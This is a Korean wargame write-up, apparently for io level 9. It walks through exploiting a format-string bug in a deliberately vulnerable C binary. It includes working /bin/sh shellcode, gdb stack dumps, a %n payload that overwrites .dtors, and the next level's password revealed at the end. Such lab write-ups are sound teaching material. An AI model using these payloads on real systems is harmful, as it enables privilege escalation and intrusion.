Level 9 문제 소스는 아래와 같다.
#include <stdio.h>
#include <string.h>
/* Challenge binary for this level: copies argv[1] into a stack buffer and
 * prints it. The two defects below are what the rest of the page exploits. */
int main(int argc, char **argv) {
/* Never read after initialisation; presumably just stack filler (its exact
 * placement relative to buf is up to the compiler). */
int pad = 0xbabe;
char buf[1024];
/* argc is not checked, so running the program with no argument dereferences
 * a NULL argv[1]. strncpy() with sizeof(buf) - 1 also never writes buf[1023],
 * so an argument of 1023 bytes or more leaves buf without a NUL terminator. */
strncpy(buf, argv[1], sizeof(buf) - 1);
/* Format-string bug: attacker-controlled data is used as the format string,
 * so %x reads stack words and %n writes to addresses placed in buf (the
 * transcript below demonstrates both). Safe form: printf("%s", buf). */
printf(buf);
return 0;
}
포맷 스트링 문제로 보인다. 확인해 보도록 하자.
level9@io:/levels$ ./level09 %x
bfffdec8level9@io:/levels$ ./level09 AAAA%x%x%x%x
AAAAbfffdebe3ffbfffd94041414141level9@io:/levels$
포맷 스트링 문제가 맞는 것으로 보인다. 이제 포맷 스트링 공격에 필요한 값들을 확인해 보자.
우선 .dtors의 주소!
level9@io:/levels$ objdump -s -j .dtors level09
level09: file format elf32-i386
Contents of section .dtors:
80494d0 ffffffff 00000000 ........
level9@io:/levels$
그리고 쉘코드의 주소!
level9@io:/levels$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level9@io:/levels$ gdb -q level09
(gdb) b main
Breakpoint 1 at 0x80483ad
(gdb) r
Starting program: /levels/level09
Breakpoint 1, 0x080483ad in main ()
Current language: auto; currently asm
(gdb) x/32wx $esp
0xbfffd890: 0x0042b298 0x00000000 0x00000000 0xbfffd8b0
0xbfffd8a0: 0x0043f7f5 0x00000008 0x00000088 0x00445ff4
0xbfffd8b0: 0xbfffd8c8 0xbfffd900 0xbfffd91c 0x00000000
0xbfffd8c0: 0x00308000 0x00308b20 0xbfffd8f0 0x0043bbfa
0xbfffd8d0: 0x00000011 0x00000008 0x003086b0 0x00000024
0xbfffd8e0: 0x00000001 0x00000000 0x00000000 0x00000000
0xbfffd8f0: 0x00000000 0x00000000 0x00000208 0x0042b700
0xbfffd900: 0x00000088 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffd910: 0x00b21d54 0x00433792 0x0068e000 0x00003893
0xbfffd920: 0x00445ff4 0xbfffdcd0 0x0042e555 0x004462a0
0xbfffd930: 0x00446820 0x00000000 0x00000000 0x00000000
0xbfffd940: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd950: 0x00000000 0x00000000 0x004465d4 0x004465c8
0xbfffd960: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd970: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd980: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffd990: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9d0: 0x00000000 0x00000000 0x004462a0 0x00000000
0xbfffd9e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffd9f0: 0x00443c43 0x00000000 0x00000000 0x00000000
0xbfffda00: 0x00000000 0x00000000 0x00000000 0x00446668
(gdb)
0xbfffda10: 0x00000000 0x00000100 0x003086b0 0x004462ac
0xbfffda20: 0x00446654 0x00000000 0x00010000 0x00000000
0xbfffda30: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffda70: 0x00000000 0x00000003 0x00000000 0x00000000
0xbfffda80: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffda90: 0x694c0000 0x0078756e 0x00000000 0x00000000
0xbfffdaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdac0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdad0: 0x69000000 0x6d732e6f 0x74687361 0x74736568
0xbfffdae0: 0x2e6b6361 0x0067726f 0x00000000 0x00000000
0xbfffdaf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdb00: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffdb10: 0x00000000 0x2e362e32 0x0011c27c 0x0d696910
0xbfffdb20: 0xbfffdb58 0x00433fc8 0x0012218a 0x0804821e
0xbfffdb30: 0x50372e36 0x00446938 0x00b21b18 0xbfff0002
0xbfffdb40: 0x00439748 0x080481e4 0x00446944 0x00445ff4
0xbfffdb50: 0x00b21aec 0x00000001 0xbfffdbd4 0x004343bd
0xbfffdb60: 0x20766f4e 0x30203632 0x33313a37 0x2039313a
0xbfffdb70: 0x0177ff8e 0x00442bdc 0xbfffdba0 0xbfffdba0
0xbfffdb80: 0xf63d4e2e 0x00b21848 0x07b1ea71 0x00000003
(gdb)
0xbfffdb90: 0x00113cbc 0x00113ab8 0x0804821d 0x0804820c
0xbfffdba0: 0x00000000 0x00000000 0x00000001 0x0000085c
0xbfffdbb0: 0x00b21b18 0x00b21848 0x0804820c 0x0011ca8c
0xbfffdbc0: 0x080481a4 0x00000001 0x00445ff4 0xf63d4e2e
0xbfffdbd0: 0x00446820 0xbfffdcc0 0x004345cf 0xbfffdcb0
0xbfffdbe0: 0x080481a4 0xbfffdca4 0x004467c4 0x00000000
0xbfffdbf0: 0x00b21b18 0x00000001 0x00000000 0x00000001
0xbfffdc00: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffdc10: 0x00000000 0x00000000 0xbfffdcb0 0xbfffdca4
0xbfffdc20: 0x00000000 0x00000000 0x00000000 0xbfffdcf0
0xbfffdc30: 0x00446668 0x0804820c 0x00000000 0x00000000
0xbfffdc40: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffdc70: 0x00000000 0x00000000 0xbfffde24 0x0017a08e
0xbfffdc80: 0x00249ff4 0x080495a8 0xbfffdc98 0x080482a8
(gdb)
0xbfffdc90: 0x00249ff4 0x080495a8 0xbfffdcb8 0x08048429
0xbfffdca0: 0x00439250 0x08048300 0x0804841b 0x00249ff4
0xbfffdcb0: 0x08048410 0x08048300 0xbfffdd18 0x00126455
0xbfffdcc0: 0x00000001 0xbfffdd44 0xbfffdd4c 0x00b21b18
0xbfffdcd0: 0x00000001 0x00000001 0x00000000 0x0804820c
0xbfffdce0: 0x00249ff4 0x08048410 0x08048300 0xbfffdd18
0xbfffdcf0: 0xebb98081 0x30c835fe 0x00000000 0x00000000
0xbfffdd00: 0x00000000 0x0043e2e0 0x0012637d 0x00445ff4
(gdb)
0xbfffdd10: 0x00000001 0x08048300 0x00000000 0x08048321
0xbfffdd20: 0x080483a4 0x00000001 0xbfffdd44 0x08048410
0xbfffdd30: 0x08048400 0x00439250 0xbfffdd3c 0x00443ae5
0xbfffdd40: 0x00000001 0xbfffde24 0x00000000 0xbfffde34
0xbfffdd50: 0xbfffdec1 0xbfffded1 0xbfffdedc 0xbfffdefe
0xbfffdd60: 0xbfffdf11 0xbfffdf1d 0xbfffdf29 0xbfffdf56
0xbfffdd70: 0xbfffdf6c 0xbfffdf7b 0xbfffdf87 0xbfffdf90
0xbfffdd80: 0xbfffdfa2 0xbfffdfaa 0xbfffdfb9 0x00000000
(gdb)
0xbfffdd90: 0x00000010 0xbfebfbff 0x00000006 0x00001000
0xbfffdda0: 0x00000011 0x00000064 0x00000003 0x08048034
0xbfffddb0: 0x00000004 0x00000020 0x00000005 0x00000007
0xbfffddc0: 0x00000007 0x0042b000 0x00000008 0x00000000
0xbfffddd0: 0x00000009 0x08048300 0x0000000b 0x000003f1
0xbfffdde0: 0x0000000c 0x000003f1 0x0000000d 0x000003f1
0xbfffddf0: 0x0000000e 0x000003f1 0x00000017 0x00000000
0xbfffde00: 0x0000000f 0xbfffde1b 0x00000000 0x00000000
(gdb)
0xbfffde10: 0x00000000 0x00000000 0x69000000 0x00363836
0xbfffde20: 0x00000000 0x76656c2f 0x2f736c65 0x6576656c
0xbfffde30: 0x0039306c 0x4c454853 0x444f434c 0x90903d45
0xbfffde40: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffde80: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb)
0xbfffde90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffdea0: 0x176a9090 0xcddb3158 0x580b6a80 0x2f685299
0xbfffdeb0: 0x6868732f 0x6e69622f 0x5352e389 0x80cde189
0xbfffdec0: 0x45485300 0x2f3d4c4c 0x2f6e6962 0x68736162
0xbfffded0: 0x52455400 0x696c3d4d 0x0078756e 0x5f485353
0xbfffdee0: 0x45494c43 0x323d544e 0x322e3131 0x312e3831
0xbfffdef0: 0x39392e36 0x32353320 0x32203638 0x53530032
0xbfffdf00: 0x54545f48 0x642f3d59 0x702f7665 0x342f7374
(gdb) q
The program is running. Exit anyway? (y or n) y
level9@io:/levels$
이제 필요한 주소를 모두 확인하였다.
.dtors : 0x080494d0
Cleanup : 0x080494d4
SHELLCODE : 0xbfffde80
de80 : 56960
56960 - (8 * 3) - 16 = 56920
1bfff - de80 = 57727
이제 공격을 해보도록 하자.
level9@io:/levels$ ./level09 `python -c "print 'AAAA' + '\xd4\x94\x04\x08' + 'BBBB' + '\xd6\x94\x04\x08' + '%8x'*3 + '%56920c%x' + '%57727c%x'"`
AAAA?BBBB?bfffde12 3ffbfffd890
.
.
.
[생략]
.
.
A80494d4
.
.
[생략]
.
.
.
B80494d6level9@io:/levels$
우리가 원하는 주소로 나온 것을 확인할 수 있다. 이제 %x를 %n으로 변경하여 다시 공격해 보자.
level9@io:/levels$ ./level09 `python -c "print 'AAAA' + '\xd4\x94\x04\x08' + 'BBBB' + '\xd6\x94\x04\x08' + '%8x'*3 + '%56920c%n' + '%57727c%n'"`
AAAA?BBBB?bfffde12 3ffbfffd890
.
.
.
[생략]
.
.
.
sh-3.2$ id
uid=1009(level9) gid=1009(level9) euid=1010(level10) groups=1009(level9),1029(nosu)
sh-3.2$ cat /home/level10/.pass
uawurxf5
sh-3.2$